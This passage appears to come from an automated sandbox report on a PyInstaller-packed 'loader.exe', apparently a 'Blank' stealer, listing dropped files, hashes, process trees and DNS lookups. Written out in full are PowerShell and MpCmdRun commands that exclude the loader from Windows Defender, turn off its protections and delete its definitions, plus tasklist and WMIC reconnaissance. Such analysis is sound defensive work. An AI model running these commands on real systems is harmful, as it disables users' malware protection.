| SHA512 | 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\select.pyd
| MD5 | 45d5a749e3cd3c2de26a855b582373f6 |
| SHA1 | 90bb8ac4495f239c07ec2090b935628a320b31fc |
| SHA256 | 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876 |
| SHA512 | c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\libssl-3.dll
| MD5 | bf4a722ae2eae985bacc9d2117d90a6f |
| SHA1 | 3e29de32176d695d49c6b227ffd19b54abb521ef |
| SHA256 | 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147 |
| SHA512 | dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\libcrypto-3.dll
| MD5 | 78ebd9cb6709d939e4e0f2a6bbb80da9 |
| SHA1 | ea5d7307e781bc1fa0a2d098472e6ea639d87b73 |
| SHA256 | 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e |
| SHA512 | b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\blank.aes
| MD5 | c232f23b0c3ae2c8b7459b0ee4361dc3 |
| SHA1 | cd858ca6b96625842cf07a7d14ae0095e032e588 |
| SHA256 | df888b9e488e873c6d0e7ed7af90ee37c6ed4e13284416ca4f750c866046c414 |
| SHA512 | 18b14ff74b7e5e70ecb859446c8044b7eefaaa9f2b664e900368363e0eaf918ccf31bee6c629f5c60dd2ab2a3cc2ae24daebfd5a9f26a51c2560b1002f1e3a39 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_ctypes.pyd
| MD5 | 00f75daaa7f8a897f2a330e00fad78ac |
| SHA1 | 44aec43e5f8f1282989b14c4e3bd238c45d6e334 |
| SHA256 | 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f |
| SHA512 | f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4 |
memory/4004-54-0x00007FFE98E90000-0x00007FFE98EBD000-memory.dmp
memory/4004-57-0x00007FFE9ED30000-0x00007FFE9ED49000-memory.dmp
memory/4004-58-0x00007FFE98E60000-0x00007FFE98E83000-memory.dmp
memory/4004-60-0x00007FFE98550000-0x00007FFE986C7000-memory.dmp
memory/4004-62-0x00007FFE9EBE0000-0x00007FFE9EBF9000-memory.dmp
memory/4004-64-0x00007FFE99530000-0x00007FFE9953D000-memory.dmp
memory/4004-66-0x00007FFE98A70000-0x00007FFE98AA3000-memory.dmp
memory/4004-69-0x00007FFE98750000-0x00007FFE9881D000-memory.dmp
memory/4004-68-0x00007FFE89C50000-0x00007FFE8A239000-memory.dmp
memory/4004-72-0x00007FFE893C0000-0x00007FFE898E0000-memory.dmp
memory/4004-73-0x000001EC417F0000-0x000001EC41D10000-memory.dmp
memory/4004-78-0x00007FFE98E10000-0x00007FFE98E1D000-memory.dmp
memory/4004-77-0x00007FFE98D00000-0x00007FFE98D14000-memory.dmp
memory/4004-75-0x00007FFE98D20000-0x00007FFE98D43000-memory.dmp
memory/4004-80-0x00007FFE892A0000-0x00007FFE893BC000-memory.dmp
memory/3364-86-0x00000216FF4C0000-0x00000216FF4E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3gcjwp3w.fci.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4004-105-0x00007FFE98E60000-0x00007FFE98E83000-memory.dmp
memory/4004-106-0x00007FFE98550000-0x00007FFE986C7000-memory.dmp
memory/4004-107-0x00007FFE9EBE0000-0x00007FFE9EBF9000-memory.dmp
memory/4004-109-0x00007FFE98D20000-0x00007FFE98D43000-memory.dmp
memory/4004-122-0x00007FFE892A0000-0x00007FFE893BC000-memory.dmp
memory/4004-118-0x00007FFE98750000-0x00007FFE9881D000-memory.dmp
memory/4004-117-0x00007FFE98A70000-0x00007FFE98AA3000-memory.dmp
memory/4004-108-0x00007FFE89C50000-0x00007FFE8A239000-memory.dmp
memory/4004-119-0x00007FFE893C0000-0x00007FFE898E0000-memory.dmp
memory/4004-123-0x000001EC417F0000-0x000001EC41D10000-memory.dmp
memory/4004-124-0x00007FFE89C50000-0x00007FFE8A239000-memory.dmp
memory/4004-152-0x00007FFE89C50000-0x00007FFE8A239000-memory.dmp
memory/4004-167-0x00007FFE89C50000-0x00007FFE8A239000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 06367276b8892ef9c6937cb2e92d0a14 |
| SHA1 | 744ad5bb29c2738ed955b98fbae74b548d88f357 |
| SHA256 | 0521f91bcd062ef1b43e01372f5db498ed4b021e955cdc1d70a43ea75f69fc85 |
| SHA512 | 873a0bacf78d5079fa2c09138112ac7673f4456535d7ab12a79e6d96e4e3ccfbf825e4c8aaeb23a4e06ea8f80c8e434438aef4ebe8bfda04b30ec135387cef1f |
\??\pipe\crashpad_4920_KQMUDADCXFPQZMGJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5970df62d5594441a67bd2bb731fda18 |
| SHA1 | 04da2549f1d11067c52045be08bb746d7f483e54 |
| SHA256 | 51760e25fbe0c46ef71f7f42331141b4b7eca003cb031281645ec602d8e8f2ac |
| SHA512 | e3536598e656f1c298e25f2facf96cb10e850ef0648de554822244abf14c62ed6d2994ef0f80180c311cd2083055d658105d730739e294a12dd44e555d54401c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 481d4f67483442e382ebfa0d3d1600d9 |
| SHA1 | bdf02e636b48535f897280a9e6e4daebdca96068 |
| SHA256 | 0436462361cc5de8a709e91bcf493868547e96b5a4df520ac17531deb3d011a7 |
| SHA512 | 61f9b53b22c9de84d25e9263ac4239140a65aca8256babae5672ebc22ada001d6018c22a5e9ddd633239147d7690c5d7ffd90f79df66ceaa97c17aa448926b80 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | ebe5e45e574732be83abe27199f5b355 |
| SHA1 | 4a4050fe1d1e868b2a9000915cd4f0f1794a30b4 |
| SHA256 | ad1557ed1cd049389194df3724c0e3916f1aeb7a47f3702dd080cfd00b38ef8c |
| SHA512 | 7a285dd1e5efa8214f18f71298bc41217befe1391baad806d6611f86de1f6e2fea975a5d40c9dfa5f68387c62a72493c0d94d80ff30a8c574f557988526e1994 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59770b.TMP
| MD5 | 1ba71877e987451059614ef7aacc1dbb |
| SHA1 | ed1e2eaa17080ae73c1a47dd8ada61822ffbee7c |
| SHA256 | c10afe6369d17e8980b3491141f531b400c524d8bd6999a7618b9e95de726feb |
| SHA512 | ba04cdcf983ee6c04645c7669d7c5b8c22f769733a9cd1431a492a420c89b8312b32d4f57b6196ebb097f82a50ca2500fc80c122d71f020e9fa5f496bbbc9d96 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-19 14:53
Reported
2024-06-19 14:56
Platform
win7-20240611-en
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2440 wrote to memory of 2908 | N/A | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe |
| PID 2440 wrote to memory of 2908 | N/A | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe |
| PID 2440 wrote to memory of 2908 | N/A | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe | C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe"
C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI24402\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
memory/2908-23-0x000007FEF5AE0000-0x000007FEF60C9000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-19 14:53
Reported
2024-06-19 14:56
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
157s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe"
C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\main\loader.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3944 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-5ozvx.in | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| GB | 23.44.234.16:80 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.116.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI48482\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
memory/4088-24-0x00007FFE6E370000-0x00007FFE6E959000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48482\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\base_library.zip
| MD5 | 32ede00817b1d74ce945dcd1e8505ad0 |
| SHA1 | 51b5390db339feeed89bffca925896aff49c63fb |
| SHA256 | 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a |
| SHA512 | a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_ctypes.pyd
| MD5 | 00f75daaa7f8a897f2a330e00fad78ac |
| SHA1 | 44aec43e5f8f1282989b14c4e3bd238c45d6e334 |
| SHA256 | 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f |
| SHA512 | f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4 |
memory/4088-30-0x00007FFE7F260000-0x00007FFE7F283000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48482\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\blank.aes
| MD5 | c232f23b0c3ae2c8b7459b0ee4361dc3 |
| SHA1 | cd858ca6b96625842cf07a7d14ae0095e032e588 |
| SHA256 | df888b9e488e873c6d0e7ed7af90ee37c6ed4e13284416ca4f750c866046c414 |
| SHA512 | 18b14ff74b7e5e70ecb859446c8044b7eefaaa9f2b664e900368363e0eaf918ccf31bee6c629f5c60dd2ab2a3cc2ae24daebfd5a9f26a51c2560b1002f1e3a39 |
memory/4088-32-0x00007FFE7F850000-0x00007FFE7F85F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48482\libcrypto-3.dll
| MD5 | 78ebd9cb6709d939e4e0f2a6bbb80da9 |
| SHA1 | ea5d7307e781bc1fa0a2d098472e6ea639d87b73 |
| SHA256 | 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e |
| SHA512 | b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\libssl-3.dll
| MD5 | bf4a722ae2eae985bacc9d2117d90a6f |
| SHA1 | 3e29de32176d695d49c6b227ffd19b54abb521ef |
| SHA256 | 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147 |
| SHA512 | dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_ssl.pyd
| MD5 | f9cc7385b4617df1ddf030f594f37323 |
| SHA1 | ebceec12e43bee669f586919a928a1fd93e23a97 |
| SHA256 | b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6 |
| SHA512 | 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_sqlite3.pyd
| MD5 | 1a8fdc36f7138edcc84ee506c5ec9b92 |
| SHA1 | e5e2da357fe50a0927300e05c26a75267429db28 |
| SHA256 | 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882 |
| SHA512 | 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_socket.pyd
| MD5 | 1a34253aa7c77f9534561dc66ac5cf49 |
| SHA1 | fcd5e952f8038a16da6c3092183188d997e32fb9 |
| SHA256 | dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f |
